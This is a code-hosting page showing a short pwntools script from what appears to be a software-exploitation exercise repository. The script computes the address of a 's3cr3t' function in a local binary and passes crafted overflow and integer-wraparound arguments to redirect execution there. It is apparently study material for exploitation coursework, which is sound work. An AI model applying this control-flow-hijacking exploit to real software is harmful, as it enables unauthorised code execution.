ludwig/soft-exp
1
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
soft-exp/ex03/mixed/mixed02.py
Ludwig Lehnert 66b90de8fe
initial commit
2025-05-22 10:44:24 +02:00

13 lines
321 B
Python
Raw Blame History

from pwn import *
import subprocess
context(arch='amd64', os='linux', log_level='info')
secret_addr = ELF('./mixed02').symbols['s3cr3t']
secret_addr = secret_addr - 0x1000 + 0x555555555000
arg0 = b'}' * 127
arg1 = b'}' + p64(secret_addr).rstrip(b'\x00')
subprocess.run(['./mixed02', arg0, '127', arg1, '4294967294'])
Reference in New Issue View Git Blame Copy Permalink